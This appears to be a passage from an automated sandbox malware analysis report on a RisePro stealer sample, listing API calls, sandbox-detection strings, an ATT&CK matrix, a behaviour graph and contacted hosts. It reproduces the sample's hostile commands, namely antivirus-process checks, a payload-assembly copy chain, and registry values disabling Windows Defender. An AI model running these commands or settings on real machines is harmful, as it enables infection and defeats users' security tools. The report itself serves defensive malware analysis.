    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B047B7 GetFileAttributesW,FindFirstFileW,FindClose,21_2_00B047B7
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B0CB81 FindFirstFileW,FindClose,21_2_00B0CB81
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B0CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,21_2_00B0CC0C
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B0F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_00B0F445
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B0F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_00B0F5A2
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B0F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,21_2_00B0F8A3
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B03B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00B03B4F
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B03E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00B03E72
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FC2022 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,21_2_00FC2022
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_01056000 CreateDirectoryA,FindFirstFileA,FindNextFileA,GetLastError,FindClose,21_2_01056000
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_01076770 FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,CreateDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error,21_2_01076770
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010238D0 FindFirstFileA,FindNextFileA,GetLastError,FindClose,21_2_010238D0
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00305D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,17_2_00305D13
    Source: Origin.pif, 00000015.00000002.3983887690.0000000001250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
    Source: SecureHawk.pif, 00000011.00000002.3984590869.000000000161D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
    Source: Origin.pif, 00000015.00000002.3983630493.0000000000F8B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
    Source: Origin.pif, 00000015.00000002.3983887690.000000000129E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}!
    Source: 5daucomrx8.exe, 00000000.00000002.1566309405.000000000066E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
    Source: Origin.pif, 00000015.00000002.3983887690.0000000001250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&,
    Source: Origin.pif, 00000015.00000002.3983887690.000000000129E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:%
    Source: Origin.pif, 00000015.00000003.3857013404.00000000012B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
    Source: Origin.pif, 00000015.00000002.3983887690.000000000126F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}$+
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003643B9 BlockInput,17_2_003643B9
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00305240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,17_2_00305240
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00325BDC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,17_2_00325BDC
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FEDB00 mov eax, dword ptr fs:[00000030h]21_2_00FEDB00
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FEDB00 mov eax, dword ptr fs:[00000030h]21_2_00FEDB00
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_01066280 mov eax, dword ptr fs:[00000030h]21_2_01066280
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003486B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,17_2_003486B0
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0031A2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0031A2B5
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0031A284 SetUnhandledExceptionFilter,17_2_0031A284
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00ACA2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00ACA2B5
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00ACA284 SetUnhandledExceptionFilter,21_2_00ACA284
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FC4184 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00FC4184
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FC4311 SetUnhandledExceptionFilter,21_2_00FC4311
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FC451D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00FC451D

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0105F280 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,21_2_0105F280
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifRegistry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{52D21685-6F41-4E1C-A1BC-43C6191BF968}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpywareJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifMemory written: C:\Users\user\AppData\Local\Temp\369580\Origin.pif base: F90000 value starts with: 4D5AJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0034914C LogonUserW,17_2_0034914C
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00305240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,17_2_00305240
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00351932 SendInput,keybd_event,17_2_00351932
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035507B mouse_event,17_2_0035507B
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exitJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 369580Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MaskBathroomsCompoundInjection" Participants Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Massachusetts + Radius + Dental + Vendor + Fighting + June + Stockings + Convenience + Falls + Joke + Mask + Severe + Outreach + Sig + Bdsm 369580\ZJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\369580\Origin.pif 369580\Origin.pif 369580\ZJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifProcess created: C:\Users\user\AppData\Local\Temp\369580\Origin.pif C:\Users\user\AppData\Local\Temp\369580\Origin.pifJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pif "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pif" "C:\Users\user\AppData\Local\LinkGuard Dynamics\r"Jump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003486B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,17_2_003486B0
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00354D89 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,17_2_00354D89
    Source: Origin.pif, 0000000B.00000003.1605691240.00000000047AB000.00000004.00000800.00020000.00000000.sdmp, Origin.pif, 0000000B.00000000.1595506259.0000000000B55000.00000002.00000001.01000000.00000005.sdmp, SecureHawk.pif, 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: SecureHawk.pif, Origin.pifBinary or memory string: Shell_TrayWnd
    Source: 5daucomrx8.exe, 00000000.00000003.1560779161.00000000028F7000.00000004.00000020.00020000.00000000.sdmp, Studios.0.drBinary or memory string: u3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0031878B cpuid 17_2_0031878B
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: GetLocaleInfoW,21_2_00FE31CA
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: EnumSystemLocalesW,21_2_00FDB1B1
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_00FE32F3
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: GetLocaleInfoW,21_2_00FE33F9
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_00FE34CF
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: GetLocaleInfoW,21_2_00FDB734
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035E0CA GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,17_2_0035E0CA
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00330652 GetUserNameW,17_2_00330652
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0032409A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,17_2_0032409A
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{52D21685-6F41-4E1C-A1BC-43C6191BF968}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\ExclusionsRegistry value created: Exclusions_Extensions 1Jump to behavior
    Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{52D21685-6F41-4E1C-A1BC-43C6191BF968}Machine\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableAntiSpyware 1Jump to behavior
    Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{52D21685-6F41-4E1C-A1BC-43C6191BF968}Machine\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableRoutinelyTakingAction 1Jump to behavior
    Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{52D21685-6F41-4E1C-A1BC-43C6191BF968}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableBehaviorMonitoring 1Jump to behavior
    Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{52D21685-6F41-4E1C-A1BC-43C6191BF968}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableOnAccessProtection 1Jump to behavior
    Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{52D21685-6F41-4E1C-A1BC-43C6191BF968}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableScanOnRealtimeEnable 1Jump to behavior
    Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{52D21685-6F41-4E1C-A1BC-43C6191BF968}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1Jump to behavior
    Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{52D21685-6F41-4E1C-A1BC-43C6191BF968}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1Jump to behavior
    Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{52D21685-6F41-4E1C-A1BC-43C6191BF968}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRawWriteNotification 1Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifRegistry value created: Exclusions_Extensions 1Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifFile written: C:\Windows\System32\GroupPolicy\GPT.INIJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: Origin.pif PID: 3848, type: MEMORYSTR
    Source: Origin.pifBinary or memory string: WIN_81
    Source: Origin.pifBinary or memory string: WIN_XP
    Source: Origin.pifBinary or memory string: WIN_XPe
    Source: SecureHawk.pif.11.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyteP
    Source: Origin.pifBinary or memory string: WIN_VISTA
    Source: Origin.pifBinary or memory string: WIN_7
    Source: Origin.pifBinary or memory string: WIN_8

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: Origin.pif PID: 3848, type: MEMORYSTR
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00366733 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,17_2_00366733
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00366BF7 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,17_2_00366BF7
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information11
    Scripting
    2
    Valid Accounts
    1
    Windows Management Instrumentation
    11
    Scripting
    1
    Exploitation for Privilege Escalation
    51
    Disable or Modify Tools
    21
    Input Capture
    12
    System Time Discovery
    Remote Services1
    Archive Collected Data
    1
    Ingress Tool Transfer
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts12
    Native API
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Deobfuscate/Decode Files or Information
    LSASS Memory1
    Account Discovery
    Remote Desktop Protocol21
    Input Capture
    2
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Scheduled Task/Job
    2
    Valid Accounts
    1
    Bypass User Account Control
    2
    Obfuscated Files or Information
    Security Account Manager3
    File and Directory Discovery
    SMB/Windows Admin Shares3
    Clipboard Data
    1
    Non-Standard Port
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCron1
    Scheduled Task/Job
    2
    Valid Accounts
    1
    Software Packing
    NTDS37
    System Information Discovery
    Distributed Component Object ModelInput Capture1
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
    Access Token Manipulation
    1
    DLL Side-Loading
    LSA Secrets141
    Security Software Discovery
    SSHKeylogging1
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts212
    Process Injection
    1
    Bypass User Account Control
    Cached Domain Credentials11
    Virtualization/Sandbox Evasion
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
    Scheduled Task/Job
    111
    Masquerading
    DCSync4
    Process Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
    Valid Accounts
    Proc Filesystem11
    Application Window Discovery
    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
    Virtualization/Sandbox Evasion
    /etc/passwd and /etc/shadow1
    System Owner/User Discovery
    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
    Access Token Manipulation
    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
    Process Injection
    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519279 Sample: 5daucomrx8.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 63 jZFqZYoOtpryMyRHD.jZFqZYoOtpryMyRHD 2->63 77 Suricata IDS alerts for network traffic 2->77 79 Multi AV Scanner detection for submitted file 2->79 81 Yara detected RisePro Stealer 2->81 83 5 other signatures 2->83 10 5daucomrx8.exe 95 2->10         started        14 wscript.exe 1 2->14         started        signatures3 process4 file5 53 C:\Users\user\AppData\Local\Temp\Vendor, data 10->53 dropped 55 C:\Users\user\AppData\Local\Temp\Stockings, data 10->55 dropped 57 C:\Users\user\AppData\Local\Temp\Sig, data 10->57 dropped 59 14 other files (13 malicious) 10->59 dropped 93 Found stalling execution ending in API Sleep call 10->93 95 Writes many files with high entropy 10->95 16 cmd.exe 3 10->16         started        97 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->97 20 SecureHawk.pif 14->20         started        signatures6 process7 file8 41 C:\Users\user\AppData\Local\...\Origin.pif, PE32 16->41 dropped 65 Drops PE files with a suspicious file extension 16->65 67 Writes many files with high entropy 16->67 22 Origin.pif 4 16->22         started        26 cmd.exe 2 16->26         started        28 conhost.exe 16->28         started        30 7 other processes 16->30 signatures9 process10 file11 45 C:\Users\user\AppData\...\SecureHawk.pif, PE32 22->45 dropped 47 C:\Users\user\AppData\Local\...\r, data 22->47 dropped 49 C:\Users\user\AppData\Local\...\SecureHawk.js, ASCII 22->49 dropped 85 Found stalling execution ending in API Sleep call 22->85 87 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 22->87 89 Found API chain indicative of sandbox detection 22->89 91 5 other signatures 22->91 32 Origin.pif 10 7 22->32         started        37 schtasks.exe 1 22->37         started        51 C:\Users\user\AppData\Local\Temp\369580\Z, data 26->51 dropped signatures12 process13 dnsIp14 61 3.36.173.8, 49710, 50500 AMAZONEXPANSIONGB United States 32->61 43 C:\Windows\System32behaviorgraphroupPolicybehaviorgraphPT.INI, ASCII 32->43 dropped 69 Disables Windows Defender (deletes autostart) 32->69 71 Exclude list of file types from scheduled, custom, and real-time scanning 32->71 73 Adds extensions / path to Windows Defender exclusion list (Registry) 32->73 75 2 other signatures 32->75 39 conhost.exe 37->39         started        file15 signatures16 process17

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    5daucomrx8.exe32%ReversingLabsWin32.Trojan.Generic
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pif0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\369580\Origin.pif0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Beginning0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
    https://www.maxmind.com/en/locate-my-ip-address0%Avira URL Cloudsafe
    http://www.winimage.com/zLibDll0%Avira URL Cloudsafe
    https://ipinfo.io/0%Avira URL Cloudsafe
    https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll0%Avira URL Cloudsafe
    http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
    https://t.me/RiseProSUPPORT0%Avira URL Cloudsafe
    http://www.autoitscript.com/autoit3/00%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    jZFqZYoOtpryMyRHD.jZFqZYoOtpryMyRHD
    unknown
    unknowntrue
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dllOrigin.pif, 00000015.00000002.3983668133.0000000000F90000.00000040.00000400.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://www.autoitscript.com/autoit3/J5daucomrx8.exe, 00000000.00000003.1560779161.0000000002900000.00000004.00000020.00020000.00000000.sdmp, Origin.pif, 0000000B.00000003.1605691240.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, Origin.pif, 0000000B.00000000.1595592768.0000000000B68000.00000002.00000001.01000000.00000005.sdmp, SecureHawk.pif, 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmp, Origin.pif, 00000015.00000002.3983571280.0000000000B68000.00000002.00000001.01000000.00000005.sdmp, Origin.pif, 00000015.00000002.3984435194.0000000004E7D000.00000004.00000020.00020000.00000000.sdmp, Origin.pif.2.dr, Studios.0.dr, SecureHawk.pif.11.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.winimage.com/zLibDllOrigin.pif, Origin.pif, 00000015.00000002.3983668133.0000000000F90000.00000040.00000400.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://t.me/RiseProSUPPORTOrigin.pif, 00000015.00000002.3983887690.0000000001257000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://nsis.sf.net/NSIS_ErrorError5daucomrx8.exefalse
      • URL Reputation: safe
      unknown
      https://ipinfo.io/Origin.piffalse
      • Avira URL Cloud: safe
      unknown
